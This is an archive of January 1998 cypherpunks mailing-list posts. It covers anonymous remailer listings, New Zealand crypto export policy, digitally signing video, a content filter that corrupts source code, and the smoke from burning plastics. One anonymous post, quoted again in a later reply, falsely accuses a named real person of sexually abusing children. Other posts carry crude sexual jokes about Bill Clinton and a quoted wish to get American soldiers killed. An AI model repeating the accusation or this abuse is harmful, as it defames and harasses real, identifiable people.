/*.*/publicite/
/*.*/reklame/
/*.*/sponsor.gif
/*.*/sponsors?[0-9]?/
/*.*/werb\..*
/ad_images/
/bin/nph-oma.count/ct/default.shtml
/bin/nph-oma.count/ix/default.html
/cgi-bin/nph-load
/netscapeworld/nw-ad/
/worldnet/ad.cgi
/rotads/
/rotateads/
/rotations/
/promotions/houseads/
**************************************************************************

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Mon, 26 Jan 1998 16:29:01 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <b255cdc352e1a702a4efd7387a6ec347@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Timothy May prefers to have sex with little kids 
because his own penis is like that of a 
three-year-old.

            /\**/\
           ( o_o  )_) Timothy May
           ,(u  u  ,),
          {}{}{}{}{}{}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 26 Jan 1998 11:06:38 +0800
To: cypherpunks@cyberpass.net
Subject: More dumb ad sites for your killfile
Message-ID: <199801260247.DAA11848@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ads.lycos.com
ad.doubleclick.net
ads.altavista.digital.com
ad.preferences.com
ph-ad*.focalink.com
www.news.com/Banners
ads.lycos.com
static.wired.com/advertising





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 26 Jan 1998 11:04:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Burning papers
In-Reply-To: <3.0.5.32.19980125115620.007d0680@popd.ix.netcom.com>
Message-ID: <199801260300.EAA13290@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:

> I burned a couple of floppies, too. Actually I am not sure how good job
> would shredding of floppies do. I assume that bits and pieces of data
> can still be recovered... But hopefully no one would care enough.

I've heard that you can look at it under a microscope with a polarizing
filter and see the magnetic patterns.  But it's much easier to just encrypt
the disk so you don't waste the media when you're finished.

Plastic should burn fine, as most is polyethylene (CH2) which produces
water and carbon dioxide when burned, leaving virtually no residue.  The
only plastic that you'd need to worry about is chlorinated stuff like PVC.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 26 Jan 1998 11:33:54 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
In-Reply-To: <199801230425.FAA19403@basement.replay.com>
Message-ID: <199801260327.EAA16232@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous  <nobody@REPLAY.COM> writes:

>> 7) What are the following government agencies and what are their function?

>> h) DOJ

> They harass Microsoft

They're the ones who look the other way when high government officials
are involved with corruption (like illegal campaign fundraising, etc.).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 26 Jan 1998 23:05:10 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199801261450.GAA27777@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash middle latent cut ek";
$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp pgponly hash cut ksub reord ?";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp pgponly hash latent cut ek";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"reno"} = "<middleman@cyberpass.net> cpunk mix pgp hash middle latent cut ek reord ?";
$remailer{"cracker"} = "<remailer@anon.efga.org> cpunk mix remix pgp hash ksub esub latent cut ek reord post";
$remailer{'redneck'} = '<config@anon.efga.org> newnym pgp';
$remailer{"bureau42"} = "<remailer@bureau42.ml.org> cpunk mix pgp ksub hash latent cut ek";
$remailer{"neva"} = "<remailer@neva.org> cpunk pgp pgponly hash cut ksub ?";
$remailer{"lcs"} = "<mix@anon.lcs.mit.edu> mix";
$remailer{"medusa"} = "<medusa@weasel.owl.de> mix middle"
$remailer{"McCain"} = "<mccain@notatla.demon.co.uk> mix middle";
$remailer{"valdeez"} = "<valdeez@juno.com> cpunk pgp pgponly hash ek";
$remailer{"arrid"} = "<arrid@juno.com> cpunk pgp pgponly hash ek";
$remailer{"hera"} = "<goddesshera@juno.com> cpunk pgp pgponly hash ek";
$remailer{"htuttle"} = "<h_tuttle@rigel.cyberpass.net> cpunk pgp hash latent cut post ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.
remailer@crynwr.com is _not_ a remailer.

There is no remailer at relay.com.

Groups of remailers sharing a machine or operator:
(cyber mix reno winsock)
(weasel squirrel medusa)
(cracker redneck)
(nym lcs)
(valdeez arrid hera)

This remailer list is somewhat phooey. Go check out
http://www.publius.net/rlist.html for a good one.

Last update: Thu 23 Oct 97 15:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
hera     goddesshera@juno.com             ------------  5:03:45  99.86%
nym      config@nym.alias.net             +*#**#**###       :34  95.82%
redneck  config@anon.efga.org             #*##*+#****      2:00  95.44%
mix      mixmaster@remail.obscura.com     +++ ++++++*     19:18  95.27%
squirrel mix@squirrel.owl.de              -- ---+---    2:34:19  95.16%
cyber    alias@alias.cyberpass.net        *++***+ ++      11:26  95.11%
replay   remailer@replay.com              ****   ***      10:06  94.93%
arrid    arrid@juno.com                   ----.------   8:50:34  94.41%
bureau42 remailer@bureau42.ml.org          ---------    3:38:29  93.53%
cracker  remailer@anon.efga.org           +  +*+*+*+      16:32  92.80%
jam      remailer@cypherpunks.ca          +  +*-++++      24:14  92.79%
winsock  winsock@rigel.cyberpass.net      -..-..----    9:59:18  92.22%
neva     remailer@neva.org                ------****+   1:03:02  90.39%
valdeez  valdeez@juno.com                               4:58:22 -36.97%
reno     middleman@cyberpass.net                        1:01:28  -2.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 26 Jan 1998 21:54:30 +0800
To: cypherpunks@toad.com
Subject: Re: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <1.5.4.32.19980126133825.00baba0c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart compared the PR of RPK New Zealand's crypto
to Peter Gutmann's claims for NZ export controls.

This contrast confirms the report a few days back that any 
commercial crypto product that receives export approval from
any country is probably compromised notwithstanding the 
manufacturer's claims otherwise. Not that it's news here, but
this appears to be the unpublished requirement for granting 
of approvals, case by case. Either cooperate or face indefinite 
delays.

As Peter noted some time ago, this is what he was running into 
when he could not get a clear answer about NZ regulations, 
and parallels reports of similar experiences in the US, UK and 
other countries.

There is a similar current thread on UK Crypto about the difficulty
of getting a straight answer about crypto policy from HMG while
observing the success of cooperating crypto manufacturers.

It will be interesting to see how hard Congress pushes in the new 
session to expose what the Administration is up to behind BXA's
closed doors in contrast to open accounts.

And, what will be revealed (and concealed) bit by bit from the 
horse-trading of the Bernstein, Karn and Junger cases.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 27 Jan 1998 01:25:58 +0800
To: cypherpunks@toad.com
Subject: Re: Clinton needs a war with Iraq
In-Reply-To: <v03102800b0f007a3850a@[207.167.93.63]>
Message-ID: <3.0.5.32.19980126085103.007ffe80@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 06:37 PM 1/24/98 EST, Dr.Dimitri Vulis KOTM wrote:
disrupt the war effort.
>
>I'm with you, Commander Timmy.  What can I do do get some American aggressors
>killed?
>
>Hands off Iraq!
>

You haven't been having sexual relations with the President, have you Dmitri?


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"The tragedy of Galois is that he could have contributed so much
more to mathematics if he'd only spent more time on his marksmanship."



	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 27 Jan 1998 13:04:28 +0800
To: Matthew Ghio <ghio@temp0195.myriad.ml.org>
Subject: Re: State of the Union Address
In-Reply-To: <199801241849.NAA17756@myriad>
Message-ID: <Pine.BSF.3.91.980126093631.12571B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain






On Sat, 24 Jan 1998, Matthew Ghio wrote:

> Anonymous wrote:
> 
> > [1] Grab a totally random sample of 100 high school students. Haul the
> >     students out one at a time and ask them the following questions:
> [snip]
> > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> >     circumstances, what is produced and in what quantities?
> > 
> 
> The correct answer is an explosion and a big mess.  One student in my high
> school chemistry class learned this the hard way.  :)
> 
> 

Um, salt water explodes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gene Carozza <carozza@cylink.com>
Date: Tue, 27 Jan 1998 02:17:22 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Cylink and Organized Crime?
Message-ID: <3.0.32.19980126095204.00870b10@192.43.161.2>
MIME-Version: 1.0
Content-Type: text/enriched

 Dear John,

Thanks for your inquiry.  These "serious charges" are completely inaccurate.

Regards,

Gene C.


At 12:42 PM 1/26/98 -0500, John Young wrote:
>Mr. Gene Carozza
>Security Public Relations
>Cylink Corporation
>
>Dear Mr. Carozza,
>
>We have received two recent e-mail messages concerning
>Cylink's alleged links to organized crime. The messages
>may be seen on the Web at:
>
>   http://jya.com/cylinked.htm
>
>This is a serious charge. Could you provide information to 
>answer it?
>
>Sincerely,
>
>John Young
>
>
>
Gene Carozza					Phone:  408-328-5175
Sr. Public Relations Manager		Fax:  408-774-2522
Cylink Corp.					Pager:  1-800-716-6434
910 Hermosa Ct.				Cell:   408-529-8402
Sunnyvale, CA 94086				email:  carozza@cylink.com			
www.cylink.com							












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 27 Jan 1998 00:43:36 +0800
To: cypherpunks@toad.com
Subject: Re: Technologies of Political Control
Message-ID: <1.5.4.32.19980126162629.006cc9a8@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



A bit more on getting a copy of the report:

   An Appraisal of Technologies of Political Control

It is Scientific and Technological Options Assessment (STOA) of the
European Parliament offering the report, not British MEP Glyn Ford, 
who was its sponsor. For a copy to be sent by snail, fax a request 
to STOA in Luxembourg:

  352-4300-22418

No electronic version is available from STOA. Draft reports
remain in paper format until finalized by the European
Parliament, which may take a while.

STOA's publications web site was last updated in July 1996, 
and its rep apologized for the trailing-edge tech.

   http://www.europarl.eu.int/dg4/stoa/en/publi/publi.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 01:46:21 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Video & cryptography...
Message-ID: <199801261728.LAA27585@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I was in a discussion with several people regarding the rate if improvement
of current video production equipment and how it would effect the veracity
of video images of all sorts in future legal cases.

Is anyone aware of anybody working on a mechanism to digitaly sign video and
photographs (a cool app of stego I suspect)? This would alleviate a great
deal of mistrust for security video cams and such. What I had in mind was
the manufacturer puts a unique key in each machines rom's and when each
image comes in a signature of the image and the key is stored in the
interframe retraces that are normaly not shown (ala videotext). I asked a
couple of people in the biz that I know and it seemed a new concept to them.

Just a thought...


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Jan 1998 01:36:55 +0800
To: cypherpunks@cyberpass.net
Subject: CyberSitter to the rescue.
Message-ID: <v04003906b0f2716ac2dc@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 20 Jan 1998 17:19:45 -0500
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Cc: bostic@bsdi.com
Subject: CyberSitter to the rescue.
Date: Tue, 20 Jan 1998 16:08:19 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/2639
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org
Status: U


Forwarded-by: Faried Nawaz <fn@LISP-READER.Hungry.COM>
Forwarded-by: acb@zikzak.net (Andrew C. Bulhak)
Forwarded-by: Matt Curtis <mattc@beam.com.au>

This is from the PerForce mailing list, PerForce is a source code
control system that doesn't use mounted drives, but instead uses
TCP/IP socket communications to check code in and out.

-----

Well, I just spent several hours tracking something down that I
think is SO braindead that it must be called evil.  I hope this
will save someone else some hassle.

There's an NT box on my desk that someone else uses every now and
then.  This machine is otherwise used as my programming box and
backup server.

All of a sudden, my programming files were being corrupted in odd
places.  I thought "hmm, my copy must be corrupt".  So I
refreshed the files.  No change.  "hmm, the code depot copy must
be corrupt"..  Checked from other machines.  No problem there.

Viewed the file from a web based change browser in Internet
Explorer.  Same corruption in the file.  Telnet'd to the server
machine and just cat'd the file to the terminal.  Same problem.
What's going on?

The lines that were corrupted were of the form

 #define one 1 /* foo menu */
 #define two 2 /* bar baz */

What I always saw ON THIS MACHINE ONLY was:

 #define one 1 /* foo     */
 #  fine two 2 /* bar baz */

Can you guess what was happening?

Turns out, someone had inadvertly installed this piece of garbage
called CyberSitter, which purports to protect you from nasty
internet content.  Turns out that it does this by patching the
TCP drivers and watching the data flow over EVERY TCP STREAM.
Can you spot the offense word in my example?  It's "NUDE".  Seems
that cybersitter doesn't care if there are other characters in
between.  So it blanks out "nu */ #de" without blanking out the
punctuation and line breaks.  Very strange and stupid.

It also didn't like the method name "RefreshItems" in another
file, since there is obviously a swear word embedded in there.
Sheesh.

It's so bad it's almost funny.  Hope this brightens your day as
much as it brighted mine :-).

 ----
 +----------------------+---+
 | Ross Johnson         |   | E-Mail: rpj@ise.canberra.edu.au
 | Info Sciences and Eng|___|
 | University of Canberra   | FAX:    +61 6 2015227
 | PO Box 1                 |
 | Belconnen  ACT    2616   | WWW: http://willow.canberra.edu.au/~rpj/
 | AUSTRALIA                |
 +--------------------------+

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Jan 1998 01:37:03 +0800
To: cypherpunks@cyberpass.net
Subject: Spies Like Us.
Message-ID: <v0400390bb0f272fc214f@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Wed, 21 Jan 1998 12:33:35 -0500
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Subject: Spies Like Us.
Date: Wed, 21 Jan 1998 11:21:56 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/2642
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: Nev Dull <nev@bostic.com>
Forwarded-by: chuck <Chuck@Yerkes.com>
Forwarded-by: David HM Spector <spector@zeitgeist.com>
Forwarded-by: Declan McCullagh <declan@well.com>

Date: Tue, 20 Jan 1998 13:42:26 -0800 (PST)
From: Dan Tsang <dtsang@sun1.lib.uci.edu>
To: Declan McCullagh <declan@well.com>
Subject: CIA changes Web FAQ: concedes spying on Americans

Last month, the CIA had to change its Web FAQ page because of my case,
Tsang v. CIA, which was settled when the CIA promised not to spy on me
again.  But it refused to make the same promise to cover other Americans.
The original FAQ page had said "No" to a question whether or not it spies
on Americans.  Now it concedes it spies on Americans.  The new CIA FAQ is
at:
	http://www.odci.gov/cia/public_affairs/faq.html

See my account in Sunday's (Jan. 18) Los Angeles Times Opinion page:
A CIA Target at Home in America.  It can be found at:

http://www.latimes.com/sbin/my_iarecord.pl?NS-doc-path=/httpd/docs/HOME/NEWS/
OPINION/t000005584.html&NS-doc-offset=1&NS-collection=DailyNews&NS-search-set=/
var/tmp/34c3e/aaaa001wBc3eacf&

Daniel C. Tsang
Bibliographer for Asian American Studies
 & Social Sciences (Economics, Politics)
Machine-Readable Data Files Librarian
Lecturer, School of Social Sciences
380 Main Library
University of California
PO Box 19557
Irvine CA 92623-9557
USA

dtsang@uci.edu
(714) 824-4978
(714) 824-5740 fax
homepage: http://sun3.lib.uci.edu/~dtsang
   add suffix for news: /netnews1.htm
                  politics: /pol.htm
                  economics: /econ.htm
                  asian american studies: /aas.htm
                  soc sci data archives: /ssda.htm
                  public opinion: /pod.htm
                  AWARE: awarefs/htm
host, "Subversity" on KUCI, 88.9 FM in Orange County
  each Tuesday from 5-6 p.m.; selected shows w/ audio online:
  http://www.kuci.uci.edu/~dtsang/subversity
N.B.: This is NOT official University of California correspondence.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J-Dog <root@Elitehackers.org>
Date: Wed, 28 Jan 1998 04:28:58 +0800
To: cypherpunks@toad.com
Subject: RE: Latest Clinton dodge?
In-Reply-To: <3.0.5.32.19980127090723.008012c0@206.40.207.40>
Message-ID: <3.0.3.32.19980126122113.007237bc@carlink.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:15 PM 1/27/98 EST, Dr.Dimitri Vulis KOTM wrote:
>David Honig <honig@otc.net> writes:
>
>> At 07:11 PM 1/26/98 EST, you wrote:
>> >"Roger J Jones" <cyber@ibpinc.com> writes:
>> >
>> >> 
>> >> Thanks for the info - while I am at it - has anyone ever disclosed the
>> >> "distinguishing characteristic" that Paula Jones claims will prove its
>> Bubba
>> >> Bill?
>> >> 
>> >Can you spell "curvature"?
>> 
>> So you *do* have intimate knowledge of the president....
>> but I won't tell :-)
>
>What is the difference between Bill Clinton and the Titanic?
>Only 1700 people went down on the Titanic.
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>

most people get Aids  from sex
clinton gets sex from Aids

lates
J-Dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Graham-John Bullers <real@freenet.edmonton.ab.ca>
Date: Tue, 27 Jan 1998 03:49:40 +0800
To: Anonymous <anon@anon.efga.org>
Subject: Re: your mail
In-Reply-To: <b255cdc352e1a702a4efd7387a6ec347@anon.efga.org>
Message-ID: <Pine.A41.3.95.980126122813.81916A-100000@fn2.freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 26 Jan 1998, Anonymous wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> Timothy May prefers to have sex with little kids 
> because his own penis is like that of a 
> three-year-old.
> 
>             /\**/\
>            ( o_o  )_) Timothy May
>            ,(u  u  ,),
>           {}{}{}{}{}{}
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email : <real@freenet.edmonton.ab.ca> : <ab756@freenet.toronto.on.ca>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <Hua@teralogic-inc.com>
Date: Tue, 27 Jan 1998 04:43:19 +0800
To: "'cryptography@c2.net
Subject: RE: Update on New Zealand crypto policy
Message-ID: <413AC08141DBD011A58000A0C924A6D50D7D73@MVS2>
MIME-Version: 1.0
Content-Type: text/plain



Need help:  Can anyone get to this URL?

Ern

	-----Original Message-----
	From:	pgut001@cs.auckland.ac.nz
[SMTP:pgut001@cs.auckland.ac.nz]
	Sent:	Saturday, January 24, 1998 4:20 PM
	To:	cryptography@c2.net
	Cc:	cypherpunks@cyberpass.net
	Subject:	Update on New Zealand crypto policy



	As part of my recent effort to prepare a useful home page after
2 years of 
	having instead a mini text adventure, I've finally got around to
finishing off 
	the web page containing the recent history of, and current state
of, New 
	Zealands crypto export policy as decided by several intelligence
agencies and 
	a supporting cast of bungling bureaucrats.  This policy has
resulted in New 
	Zealand enjoying the dubious distinction of having the strictest
export 
	controls on earth, with everything ranging from crypto hardware
down to 
	software, library books, computer magazines, and journals being
restricted 
	from export.  It's not even possible for a university to publish
academic 
	research without prior permission from a government agency, and
the 
	requirements for obtaining this permission are structured to
ensure that they 
	can never be fulfilled.  You can find the information on:
	 
	  http://www.cs.auckland.ac.nz/~pgut001/policy/
	 
	The page also contains links to a sizeable collection of
never-before- 
	published documents including correspondence with relevant
government 
	agencies, and media reports on the situation.
	 
	If you're going to send me mail about this, please note that
I'll be at Usenix 
	in San Antonio for the next week, so it'll take awhile for me to
reply.  My 
	PGP key's at the bottom of my home page if you need it.
	 
	Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 02:43:32 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Burning Papers - Plastics - Cyanides - Reference
Message-ID: <199801261834.MAA28198@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi, 

It took a few minutes to find one, but below is just one of the many
standards that are implimented for plastic uses in the home that make
reference to minimal levels of HCN in particular.

Despite what some folks would like you to believe, plastics in conflagration
are *NOT* safe to inhale even in small quantitites because of these gases.

Note that I edited a bunch of lines out for brevity.


Forwarded message:

> X-within-URL: http://www.cern.ch/CERN/Divisions/TIS/safdoc/IS/is41/table1.html

> 
>                                IS 41 : TABLE 1
> 
> Test Standards and Specifications
> for the Selection of Plastics
> 
>    TEST
>    Standards (1)
>    Requirements
>      _________________________________________________________________
>    

[text deleted]

>    
>    Duration of flame application 60 s unless
>    otherwise stated according to Clause 5.
>    Time to extinction: 30 s *
>    Damaged length (mm) must be measured*
>    
>    FV0 or FV1
>    94 V0, 94V1
>    
>    FT >260!C. Length burnt
>      _________________________________________________________________
>    

[text deleted]

>      _________________________________________________________________
>    
>    
>    Toxicity
>    Toxicity of fire gases
>    
>    ABD 0031
>    
>    HF HC1 HCN SO2 + H2S CO NO + NO2
>      _________________________________________________________________
>    

[remainder deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: miner <miner333@dogbert.xroads.com>
Date: Tue, 27 Jan 1998 03:50:05 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Latest Clinton dodge?
Message-ID: <Pine.BSI.3.96.980126123709.7046A-100000@dogbert.xroads.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:55 PM 1/26/98 -0500, Declan McCullagh wrote:
>
>Clinton said this morning:
>
>>>>>
> I want you to listen to me.  I'm
>going to say this again.  I did not have sexual relations with that
>woman, Miss Lewinsky.  I never told anybody to lie, not a single time
>-- never.  These allegations are false.

Doesn't gennifer flowers has(had?) an audio tape of clinton asking her to
deny their affair, there is no proof, etc.? I think a sequence of that
audio and then the above statement played maybe 10 times on CNN would make
a nice piece of news.


><<<<
>
>The question then becomes, of course, what does "sexual relations" mean?
>
>Is it oral sex?
>
>-Declan
>
>
>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 27 Jan 1998 01:47:32 +0800
To: carozza@cylink.com
Subject: Cylink and Organized Crime?
Message-ID: <1.5.4.32.19980126174215.007173cc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Gene Carozza
Security Public Relations
Cylink Corporation

Dear Mr. Carozza,

We have received two recent e-mail messages concerning
Cylink's alleged links to organized crime. The messages
may be seen on the Web at:

   http://jya.com/cylinked.htm

This is a serious charge. Could you provide information to 
answer it?

Sincerely,

John Young





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Tue, 27 Jan 1998 03:09:42 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Burning papers (fwd)
Message-ID: <199801261855.MAA28261@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 26 Jan 1998 19:05:54 +0100 (MET)
> Subject: Re: Burning papers (fwd)
> From: nobody@REPLAY.COM (Anonymous)

> As usual Jim, your posting is prolific but your science is lacking.

Ad hominims, opinions, and no proof...

> bind to whatever it comes in contact with (usually oxygen).  The only way
> cyanide could escape in gaseous form is as HCN, however this cannot happen
> because the hydrogen has a lower activation energy for combining with
